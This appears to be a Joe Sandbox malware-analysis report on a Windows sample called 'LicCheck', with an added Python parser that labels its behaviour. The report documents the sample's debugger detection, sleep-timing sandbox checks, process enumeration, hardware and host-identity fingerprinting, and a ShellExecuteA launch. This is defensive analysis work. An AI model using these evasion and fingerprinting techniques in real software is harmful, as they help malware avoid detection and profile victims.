7b6d57 24433 7a9def 41 API calls ___std_exception_copy 24382->24433 24383 7b6ec9 24384 7b6f3d 24383->24384 24387 7b6ee2 GetConsoleMode 24383->24387 24389 7b6f41 ReadFile 24384->24389 24388 7b3705 ___free_lconv_mon 14 API calls 24385->24388 24387->24384 24390 7b6ef3 24387->24390 24391 7b6d9d 24388->24391 24392 7b6f59 24389->24392 24393 7b6fb5 GetLastError 24389->24393 24390->24389 24395 7b6ef9 ReadConsoleW 24390->24395 24396 7b6dc2 24391->24396 24397 7b6da7 24391->24397 24392->24393 24394 7b6f32 24392->24394 24398 7b6f19 24393->24398 24399 7b6fc2 24393->24399 24409 7b6f7e 24394->24409 24410 7b6f95 24394->24410 24414 7b6d62 __fread_nolock 24394->24414 
24395->24394 24402 7b6f13 GetLastError 24395->24402 24443 7b7213 43 API calls 2 library calls 24396->24443 24441 7ae7f3 14 API calls __dosmaperr 24397->24441 24398->24414 24444 7ae799 14 API calls __dosmaperr 24398->24444 24447 7ae7f3 14 API calls __dosmaperr 24399->24447 24402->24398 24403 7b3705 ___free_lconv_mon 14 API calls 24403->24362 24405 7b6fc7 24448 7ae7e0 14 API calls __dosmaperr 24405->24448 24407 7b6dac 24442 7ae7e0 14 API calls __dosmaperr 24407->24442 24445 7b6987 46 API calls 2 library calls 24409->24445 24413 7b6fae 24410->24413 24410->24414 24446 7b67df 44 API calls __fread_nolock 24413->24446 24414->24403 24416 7b6fb3 24416->24414 24417->24337 24419 7be044 24418->24419 24421 7be051 24418->24421 24452 7ae7f3 14 API calls __dosmaperr 24419->24452 24423 7be05d 24421->24423 24453 7ae7f3 14 API calls __dosmaperr 24421->24453 24422 7be049 24422->24383 24423->24383 24425 7be07e 24454 7a9def 41 API calls ___std_exception_copy 24425->24454 24427->24357 24428->24362 24429->24367 24430->24365 24431->24377 24432->24382 24433->24414 24435 7b3b27 24434->24435 24439 7b3af7 __dosmaperr 24434->24439 24456 7ae7f3 14 API calls __dosmaperr 24435->24456 24437 7b3b12 RtlAllocateHeap 24438 7b3b25 24437->24438 24437->24439 24438->24381 24439->24435 24439->24437 24455 7b1945 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 24439->24455 24441->24407 24442->24414 24443->24374 24444->24414 24445->24414 24446->24416 24447->24405 24448->24414 24449->24360 24450->24365 24451->24362 24452->24422 24453->24425 24454->24422 24455->24439 24456->24438 24458 79535a _Yarn 24457->24458 24459 795426 _Yarn 24457->24459 24458->24288 24460 7ac72b 69 API calls 24459->24460 24461 7954da 24459->24461 24460->24461 24461->24288 24464 795340 _Yarn 24462->24464 24463 79535a _Yarn 24463->24288 24464->24463 24465 7ac72b 69 API calls 24464->24465 24465->24463 24466->24290 24467->23646 24469 7afe73 24468->24469 24470 7afe85 24468->24470 24495 7aff0e GetModuleHandleW 24469->24495 24480 
7afd0e 24470->24480 24473 7afe78 24473->24470 24496 7aff73 GetModuleHandleExW 24473->24496 24475 7a53ab 24475->23239 24479 7afed7 24481 7afd1a __FrameHandler3::FrameUnwindToState 24480->24481 24502 7add02 EnterCriticalSection 24481->24502 24483 7afd24 24503 7afd5b 24483->24503 24485 7afd31 24507 7afd4f 24485->24507 24488 7afedd 24512 7aff51 24488->24512 24491 7afefb 24493 7aff73 std::locale::_Setgloballocale 3 API calls 24491->24493 24492 7afeeb GetCurrentProcess TerminateProcess 24492->24491 24494 7aff03 ExitProcess 24493->24494 24495->24473 24497 7affb2 GetProcAddress 24496->24497 24498 7affd3 24496->24498 24497->24498 24499 7affc6 24497->24499 24500 7affd9 FreeLibrary 24498->24500 24501 7afe84 24498->24501 24499->24498 24500->24501 24501->24470 24502->24483 24505 7afd67 __FrameHandler3::FrameUnwindToState 24503->24505 24504 7afdce std::locale::_Setgloballocale 24504->24485 24505->24504 24510 7b1c76 14 API calls 3 library calls 24505->24510 24511 7add4a LeaveCriticalSection 24507->24511 24509 7afd3d 24509->24475 24509->24488 24510->24504 24511->24509 24517 7bb2bb 6 API calls std::locale::_Setgloballocale 24512->24517 24514 7aff56 24515 7aff5b GetPEB 24514->24515 24516 7afee7 24514->24516 24515->24516 24516->24491 24516->24492 24517->24514 24518 7b2652 24519 7b262b __fread_nolock 41 API calls 24518->24519 24521 7b265f 24519->24521 24520 7b266b 24521->24520 24525 7b26b7 24521->24525 24541 7b281a 43 API calls __wsopen_s 24521->24541 24525->24520 24529 7b2719 24525->24529 24530 7b49ef 24525->24530 24527 7b272a 24542 7b2748 66 API calls 2 library calls 24529->24542 24531 7b49fb 24530->24531 24532 7b270c 24531->24532 24533 7b262b __fread_nolock 41 API calls 24531->24533 24532->24529 24536 7b5c43 24532->24536 24534 7b4a16 24533->24534 24535 7be037 __fread_nolock 41 API calls 24534->24535 24535->24532 24537 7b2a9c __dosmaperr 14 API calls 24536->24537 24538 7b5c60 24537->24538 24539 7b3705 ___free_lconv_mon 14 API calls 24538->24539 24540 7b5c6a 24539->24540 24540->24529 
24541->24525 24542->24527 24543 7950b0 24544 7950b9 24543->24544 24545 7950dc 24543->24545 24544->24545 24548 7aa2fd 24544->24548 24547 7950cd 24549 7aa30f 24548->24549 24553 7aa318 ___scrt_uninitialize_crt 24548->24553 24564 7aa181 70 API calls ___scrt_uninitialize_crt 24549->24564 24551 7aa315 24551->24547 24552 7aa329 24552->24547 24553->24552 24556 7aa121 24553->24556 24557 7aa12d __FrameHandler3::FrameUnwindToState 24556->24557 24565 7ac413 EnterCriticalSection 24557->24565 24559 7aa13b 24566 7aa28f 24559->24566 24563 7aa15e 24563->24547 24564->24551 24565->24559 24567 7aa2a4 ___std_exception_copy 24566->24567 24568 7aa2ab 24567->24568 24569 7aa2b6 24567->24569 24580 7aa181 70 API calls ___scrt_uninitialize_crt 24568->24580 24571 7aa226 ___scrt_uninitialize_crt 66 API calls 24569->24571 24573 7aa2c0 24571->24573 24572 7aa2b1 24574 7a9b2b ___std_exception_copy 41 API calls 24572->24574 24573->24572 24575 7b262b __fread_nolock 41 API calls 24573->24575 24576 7aa14c 24574->24576 24577 7aa2d7 24575->24577 24579 7aa175 LeaveCriticalSection __fread_nolock 24576->24579 24581 7b2b9b 45 API calls 3 library calls 24577->24581 24579->24563 24580->24572 24581->24572 24582 7b4b14 24583 7b4b21 24582->24583 24588 7b4b39 24582->24588 24632 7ae7f3 14 API calls __dosmaperr 24583->24632 24585 7b4b26 24633 7a9def 41 API calls ___std_exception_copy 24585->24633 24587 7b4b31 24588->24587 24589 7b4b98 24588->24589 24590 7b5c43 14 API calls 24588->24590 24591 7b262b __fread_nolock 41 API calls 24589->24591 24590->24589 24592 7b4bb1 24591->24592 24602 7b6b59 24592->24602 24595 7b262b __fread_nolock 41 API calls 24596 7b4bea 24595->24596 24596->24587 24597 7b262b __fread_nolock 41 API calls 24596->24597 24598 7b4bf8 24597->24598 24598->24587 24599 7b262b __fread_nolock 41 API calls 24598->24599 24600 7b4c06 24599->24600 24601 7b262b __fread_nolock 41 API calls 24600->24601 24601->24587 24603 7b6b65 __FrameHandler3::FrameUnwindToState 24602->24603 24604 7b6b6d 24603->24604 24609 7b6b85 
24603->24609 24635 7ae7e0 14 API calls __dosmaperr 24604->24635 24606 7b6c42 24642 7ae7e0 14 API calls __dosmaperr 24606->24642 24608 7b6b72 24636 7ae7f3 14 API calls __dosmaperr 24608->24636 24609->24606 24612 7b6bbb 24609->24612 24610 7b6c47 24643 7ae7f3 14 API calls __dosmaperr 24610->24643 24614 7b6bd9 24612->24614 24615 7b6bc4 24612->24615 24634 7bb43a EnterCriticalSection 24614->24634 24637 7ae7e0 14 API calls __dosmaperr 24615->24637 24617 7b6bd1 24644 7a9def 41 API calls ___std_exception_copy 24617->24644 24619 7b6bdf 24621 7b6bfb 24619->24621 24622 7b6c10 24619->24622 24620 7b6bc9 24638 7ae7f3 14 API calls __dosmaperr 24620->24638 24639 7ae7f3 14 API calls __dosmaperr 24621->24639 24626 7b6c6d __fread_nolock 53 API calls 24622->24626 24628 7b6c0b 24626->24628 24627 7b6c00 24640 7ae7e0 14 API calls __dosmaperr 24627->24640 24641 7b6c3a LeaveCriticalSection __wsopen_s 24628->24641 24631 7b4bb9 24631->24587 24631->24595 24632->24585 24633->24587 24634->24619 24635->24608 24636->24631 24637->24620 24638->24617 24639->24627 24640->24628 24641->24631 24642->24610 24643->24617 24644->24631

Control-flow Graph

Function 007A3210, basic blocks 7a3210-7a3404 through 7a3c60-7a3c65. The plugin's node/edge listing and its executed/not-executed colouring are not reproduced here; what the listing shows is: the entry block 7a3210-7a3404 calls CreateDirectoryA, and the lpPathName it passes (007D5AEC, see APIs below) lies in the writable 007D5000 region listed under Memory Dump Source; block 7a3a97-7a3b00 calls ShellExecuteA and is reached from the entry only through the chain 7a377e-7a38da, 7a38f3-7a395b, 7a398c-7a39b4, 7a39e5-7a3a0d, 7a3a3e-7a3a7d and 7a3a80-7a3a8d; the check blocks 7a396e-7a397c, 7a39c7-7a39d5, 7a3a20-7a3a2e and 7a3b13-7a3b21 each have one edge to the 7a3c56-7a3c65 tail (calls to 791bd0 and 7a9dff) and one edge that continues through a call to 7a564d; both std::ios_base::_Ios_base_dtor references (007A3BBA, 007A3C33) fall in the exit block 7a3b31-7a3c55, which returns via 7a53be.

APIs
• CreateDirectoryA.KERNELBASE(007D5AEC,00000000), ref: 007A3261
  • Part of subcall function 007984A0: std::locale::_Init.LIBCPMT ref: 00798532
  • Part of subcall function 00797570: std::locale::_Init.LIBCPMT ref: 007975C2
  • Part of subcall function 00798930: std::_Lockit::_Lockit.LIBCPMT ref: 00798966
  • Part of subcall function 00798930: std::_Lockit::_Lockit.LIBCPMT ref: 00798988
  • Part of subcall function 00798930: std::_Lockit::~_Lockit.LIBCPMT ref: 007989A8
  • Part of subcall function 00798930: std::_Lockit::~_Lockit.LIBCPMT ref: 007989CF
• ShellExecuteA.SHELL32(00000000,?,?,?,00000000,00000000), ref: 007A3AF1
• std::ios_base::_Ios_base_dtor.LIBCPMT ref: 007A3BBA
• std::ios_base::_Ios_base_dtor.LIBCPMT ref: 007A3C33

Memory Dump Source
• Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd

Similarity
• API ID: Lockitstd::_$InitIos_base_dtorLockit::_Lockit::~_std::ios_base::_std::locale::_$CreateDirectoryExecuteShell
• String ID: %`o2$($)`q`$,_OD$I$X$XM_G$`$o&$p}$p}$r$}$Z}
• API String ID: 931165786-3414494760
• Opcode ID: 27d9447845a7be160e48ae80fc8faadf7d6a5916ed874fa4be8dfc2abbeaeb00
• Instruction ID: 7d8042759e879aed88ad6ad891d941f2a25c76255a26d4c818090ff25f911233
• Opcode Fuzzy Hash: 27d9447845a7be160e48ae80fc8faadf7d6a5916ed874fa4be8dfc2abbeaeb00
• Instruction Fuzzy Hash: C2528F70900298DFDB28CF24DC99BE9BBB4AF56304F1481D9E64DAB252D7789AC4CF50

                                                                                                    Control-flow Graph: basic blocks 7946e0 to 79508b (rendered graph and its executed/not-executed legend omitted)
                                                                                                    APIs
                                                                                                      • Part of subcall function 00793B60: GetSystemInfo.KERNELBASE(?), ref: 00793B7F
                                                                                                      • Part of subcall function 00793B60: GlobalMemoryStatusEx.KERNELBASE(?), ref: 00793BA0
                                                                                                      • Part of subcall function 00793B60: CreateFileA.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00793BF6
                                                                                                      • Part of subcall function 00793B60: DeviceIoControl.KERNELBASE(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 00793C14
                                                                                                      • Part of subcall function 00793B60: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00793C47
                                                                                                      • Part of subcall function 00793F90: IsDebuggerPresent.KERNEL32(61DA755C,?,00000044), ref: 00793FBA
                                                                                                      • Part of subcall function 00793F90: GetModuleHandleW.KERNEL32(ntdll.dll,NtDelayExecution,?,00000044), ref: 00793FE7
                                                                                                      • Part of subcall function 00793F90: GetProcAddress.KERNEL32(00000000), ref: 00793FEE
                                                                                                      • Part of subcall function 00793F90: GetTickCount64.KERNEL32 ref: 00793FFA
                                                                                                      • Part of subcall function 00793F90: NtDelayExecution.NTDLL(00000000,FA0A1F00), ref: 00794016
                                                                                                      • Part of subcall function 00793F90: GetTickCount64.KERNEL32 ref: 00794018
                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,61DA755C), ref: 00794736
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,00000000), ref: 00794CC0
                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00794D03
                                                                                                    • GetUserNameA.ADVAPI32(?,000000FF), ref: 00794D17
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name$Count64FileModuleTick$AddressComputerControlCreateDebuggerDelayDeviceExecutionFolderGlobalHandleInfoMemoryPathPresentProcStatusSystemUnothrow_t@std@@@User__ehfuncinfo$??2@
                                                                                                    • String ID: P$Z}$Z}$Z}
                                                                                                    • API String ID: 3481597238-2017049980
                                                                                                    • Opcode ID: df1b754382d08038181ce945da0c44fa645fc77fde9f1904e4cf9c51d05489dc
                                                                                                    • Instruction ID: 3c1e13cfcd10064b967279f1b50d726406a53e386632bc41cd33670ad22b1c86
                                                                                                    • Opcode Fuzzy Hash: df1b754382d08038181ce945da0c44fa645fc77fde9f1904e4cf9c51d05489dc
                                                                                                    • Instruction Fuzzy Hash: 394226B19001688BDF29CB28DC98BEDBB75AF52304F5482D8D24867283E7385BC5CF59

                                                                                                    Control-flow Graph: basic blocks 793f90 to 794045 (rendered graph and its executed/not-executed legend omitted)
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(61DA755C,?,00000044), ref: 00793FBA
                                                                                                      • Part of subcall function 00793D10: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,61DA755C), ref: 00793D42
                                                                                                      • Part of subcall function 00793D10: Process32FirstW.KERNEL32(00000000,?), ref: 00793D6B
                                                                                                      • Part of subcall function 00793D10: Process32NextW.KERNEL32(00000000,0000022C), ref: 00793D81
                                                                                                      • Part of subcall function 00793C80: CloseHandle.KERNELBASE(DEADBEEF,61DA755C), ref: 00793CBF
                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtDelayExecution,?,00000044), ref: 00793FE7
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00793FEE
                                                                                                    • GetTickCount64.KERNEL32 ref: 00793FFA
                                                                                                    • NtDelayExecution.NTDLL(00000000,FA0A1F00), ref: 00794016
                                                                                                    • GetTickCount64.KERNEL32 ref: 00794018
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Count64HandleProcess32Tick$AddressCloseCreateDebuggerDelayExecutionFirstModuleNextPresentProcSnapshotToolhelp32
                                                                                                    • String ID: NtDelayExecution$ntdll.dll
                                                                                                    • API String ID: 2350081285-521143355
                                                                                                    • Opcode ID: b2614b6752e34cdde690236994dfc7e453c055a9d83ce54b3f669525c08339b2
                                                                                                    • Instruction ID: 8905f274e679ec702200af4de6e40add8fa4abee2238d894e04e07148a68320d
                                                                                                    • Opcode Fuzzy Hash: b2614b6752e34cdde690236994dfc7e453c055a9d83ce54b3f669525c08339b2
                                                                                                    • Instruction Fuzzy Hash: E411A371A047059BDF109FB8AC49F6E77B8EB49711F000669EA11D3281EB3D95458AA4

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetSystemInfo.KERNELBASE(?), ref: 00793B7F
                                                                                                    • GlobalMemoryStatusEx.KERNELBASE(?), ref: 00793BA0
                                                                                                    • CreateFileA.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00793BF6
                                                                                                    • DeviceIoControl.KERNELBASE(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 00793C14
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00793C47
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ControlCreateDeviceFileGlobalInfoMemoryStatusSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID: @
                                                                                                    • API String ID: 3398702251-2766056989
                                                                                                    • Opcode ID: 1da666cd7dec26083ba46b597491b311fa3b5cc37ae782ba1647cb6f9b0b1ae5
                                                                                                    • Instruction ID: cfcaffaccc687216459c7a9bd82e29cab6d68c06548bb8263244fd8b6326177e
                                                                                                    • Opcode Fuzzy Hash: 1da666cd7dec26083ba46b597491b311fa3b5cc37ae782ba1647cb6f9b0b1ae5
                                                                                                    • Instruction Fuzzy Hash: 4431A270608740ABEB20DB74DC4AF5FB7E8AFC9704F404A0CF299A61D1DB78A244C796
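Read together, the three routines summarised above form one environment check: 00793B60 queries processor count, physical memory and disk geometry, 00793F90 tests for a debugger and measures whether a sleep really elapsed, and 007946E0 collects the computer name, user name and module path. The Python below is an added example written for this page; it is not code from the report, from Joe Sandbox, or from the sample. It parses the report's own API-call lines (copied into REPORT_LINES as printed above), names the Win32 constants the literal arguments equal (CSIDL_APPDATA, OPEN_EXISTING, IOCTL_DISK_GET_DRIVE_GEOMETRY, TH32CS_SNAPPROCESS, MAX_PATH, all Windows SDK values), decodes the IOCTL code into its CTL_CODE fields, and flags the call sequences that make up the anti-analysis logic. The pattern labels are an analyst's reading of the call order and are consistent with the report's signatures, but the report itself does not assign them.

```python
"""Decode a Joe Sandbox function summary's API-call lines and name the anti-analysis behaviours they form."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Call lines copied from the 00793B60, 00793F90 and 007946E0 summaries in this report;
# the "Part of subcall function" prefix is kept where the report prints it.
REPORT_LINES = """
• IsDebuggerPresent.KERNEL32(61DA755C,?,00000044), ref: 00793FBA
  • Part of subcall function 00793B60: GetSystemInfo.KERNELBASE(?), ref: 00793B7F
  • Part of subcall function 00793B60: GlobalMemoryStatusEx.KERNELBASE(?), ref: 00793BA0
  • Part of subcall function 00793B60: CreateFileA.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00793BF6
  • Part of subcall function 00793B60: DeviceIoControl.KERNELBASE(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 00793C14
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,61DA755C), ref: 00793D42
• Process32FirstW.KERNEL32(00000000,?), ref: 00793D6B
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00793D81
• GetModuleHandleW.KERNEL32(ntdll.dll,NtDelayExecution,?,00000044), ref: 00793FE7
• GetProcAddress.KERNEL32(00000000), ref: 00793FEE
• GetTickCount64.KERNEL32 ref: 00793FFA
• NtDelayExecution.NTDLL(00000000,FA0A1F00), ref: 00794016
• GetTickCount64.KERNEL32 ref: 00794018
• SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,61DA755C), ref: 00794736
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,00000000), ref: 00794CC0
• GetComputerNameA.KERNEL32(?,?), ref: 00794D03
• GetUserNameA.ADVAPI32(?,000000FF), ref: 00794D17
"""

LINE_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\S+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)

# (API name, argument index) -> {literal value: Windows SDK constant name}
NAMED_ARGS = {
    ("SHGetFolderPathA", 1): {0x1A: "CSIDL_APPDATA"},
    ("CreateFileA", 2): {0x3: "FILE_SHARE_READ|FILE_SHARE_WRITE"},
    ("CreateFileA", 4): {0x3: "OPEN_EXISTING"},
    ("DeviceIoControl", 1): {0x70000: "IOCTL_DISK_GET_DRIVE_GEOMETRY"},
    ("DeviceIoControl", 5): {0x18: "sizeof(DISK_GEOMETRY)"},
    ("CreateToolhelp32Snapshot", 0): {0x2: "TH32CS_SNAPPROCESS"},
    ("GetModuleFileNameA", 2): {0x104: "MAX_PATH"},
}

@dataclass
class Call:
    api: str
    module: str
    args: List[str]      # raw tokens; "?" is an argument the sandbox could not resolve
    ref: int             # address of the call instruction
    sub: Optional[str]   # enclosing subcall function, when the report names one

def as_int(tok: str) -> Optional[int]:
    """Hex literal -> int; None for '?', strings and symbol names."""
    return int(tok, 16) if re.fullmatch(r"[0-9A-F]{1,16}", tok) else None

def parse_calls(text: str) -> List[Call]:
    """Parse the report's API-call lines and order them by call-site address."""
    calls = []
    for raw in text.splitlines():
        m = LINE_RE.search(raw.strip().lstrip("•").strip())
        if not m:
            continue
        args = [a for a in (m.group("args") or "").split(",") if a]
        calls.append(Call(m.group("api"), m.group("module"), args,
                          int(m.group("ref"), 16), m.group("sub")))
    return sorted(calls, key=lambda c: c.ref)

def annotate(call: Call) -> Dict[int, str]:
    """Argument index -> constant name, for the literal arguments that equal a known constant."""
    return {i: NAMED_ARGS[(call.api, i)][as_int(tok)]
            for i, tok in enumerate(call.args)
            if as_int(tok) in NAMED_ARGS.get((call.api, i), {})}

def decode_ioctl(code: int) -> Dict[str, int]:
    """Split a CTL_CODE into its fields; 0x70000 is device 7 (FILE_DEVICE_DISK), function 0, METHOD_BUFFERED, FILE_ANY_ACCESS."""
    return {"device_type": (code >> 16) & 0xFFFF, "access": (code >> 14) & 0x3,
            "function": (code >> 2) & 0xFFF, "method": code & 0x3}

def find_patterns(calls: List[Call]) -> List[str]:
    """Name the behaviours the ordered sequence shows (an analyst's reading, not a label the report assigns)."""
    apis = [c.api for c in calls]
    found = []
    if "IsDebuggerPresent" in apis:
        found.append("debugger check (IsDebuggerPresent)")
    # GetTickCount64 directly before and after NtDelayExecution: the caller measures
    # whether the sleep really elapsed, which exposes sandboxes that fast-forward sleeps.
    if any(t == ("GetTickCount64", "NtDelayExecution", "GetTickCount64")
           for t in zip(apis, apis[1:], apis[2:])):
        found.append("sleep-acceleration check (GetTickCount64 around NtDelayExecution)")
    if {"CreateToolhelp32Snapshot", "Process32FirstW"} <= set(apis):
        found.append("process enumeration (Toolhelp32 snapshot)")
    ioctls = {as_int(c.args[1]) for c in calls if c.api == "DeviceIoControl" and len(c.args) > 1}
    if {"GetSystemInfo", "GlobalMemoryStatusEx"} <= set(apis) and 0x70000 in ioctls:
        found.append("hardware fingerprint (processor count, RAM size, disk geometry)")
    if {"GetComputerNameA", "GetUserNameA"} <= set(apis):
        found.append("host identity collection (computer name and user name)")
    return found
```

Running `find_patterns(parse_calls(REPORT_LINES))` on the lines above yields five findings, and `annotate` on the DeviceIoControl call resolves its second argument to IOCTL_DISK_GET_DRIVE_GEOMETRY and its output-buffer size 0x18 to the 24-byte DISK_GEOMETRY structure, which is the combination that reads the physical disk size. The regex accepts the report's other line shapes too (calls without parentheses such as GetTickCount64, and the LIBCMT/LIBCPMT runtime entries), so the same parser can be pointed at any function summary on the page.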

                                                                                                    Control-flow Graph: basic blocks 798930 to 798b74 (rendered graph and its executed/not-executed legend omitted)
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00798966
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00798988
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 007989A8
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 007989CF
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00798A48
                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00798A94
                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00798AAE
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00798B43
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00798B50
                                                                                                      • Part of subcall function 007A41D0: std::invalid_argument::invalid_argument.LIBCONCRT ref: 007A41DC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
                                                                                                    • String ID: ,}$,}$bad locale name
                                                                                                    • API String ID: 1592514138-93938261
                                                                                                    • Opcode ID: aa1708593ec81a2a2feee62c87c97e527e78bc0719ebc6666475ae93bf26c8e4
                                                                                                    • Instruction ID: 56d337cab6b4e99a2e12ba66529f373e5ddfa11b005d7fde34af5d96d6c06b18
                                                                                                    • Opcode Fuzzy Hash: aa1708593ec81a2a2feee62c87c97e527e78bc0719ebc6666475ae93bf26c8e4
                                                                                                    • Instruction Fuzzy Hash: 61615FB1D01244DFDF50DFA4E845B9EBBB4BF86314F14451AE805AB342EB7DA904CB92

                                                                                                    Control-flow Graph: basic blocks 7c04d7 to 7c0800 (rendered graph and its executed/not-executed legend omitted)
                                                                                                    APIs
                                                                                                      • Part of subcall function 007C0190: CreateFileW.KERNELBASE(?,00000000,?,007C0580,?,?,00000000,?,007C0580,?,0000000C), ref: 007C01AD
                                                                                                    • GetLastError.KERNEL32 ref: 007C05EB
                                                                                                    • __dosmaperr.LIBCMT ref: 007C05F2
                                                                                                    • GetFileType.KERNELBASE(00000000), ref: 007C05FE
                                                                                                    • GetLastError.KERNEL32 ref: 007C0608
                                                                                                    • __dosmaperr.LIBCMT ref: 007C0611
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 007C0631
                                                                                                    • CloseHandle.KERNEL32(?), ref: 007C077E
                                                                                                    • GetLastError.KERNEL32 ref: 007C07B0
                                                                                                    • __dosmaperr.LIBCMT ref: 007C07B7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                    • String ID:
                                                                                                    • API String ID: 4237864984-0
